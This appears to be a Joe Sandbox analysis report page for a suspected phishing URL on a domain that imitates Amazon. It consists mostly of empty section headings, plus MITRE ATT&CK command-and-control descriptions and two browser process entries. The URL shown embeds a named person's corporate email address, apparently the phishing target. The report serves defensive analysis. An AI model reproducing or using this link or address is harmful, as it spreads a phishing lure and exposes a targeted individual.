Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Sigma Overview

Signature Overview

AV Detection:

Phishing:

Networking:

System Summary:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: iexplore.exe PID: 2044 Parent PID: 800

General

Chronological Activities

Analysis Process: iexplore.exe PID: 5140 Parent PID: 2044

General

Chronological Activities

Disassembly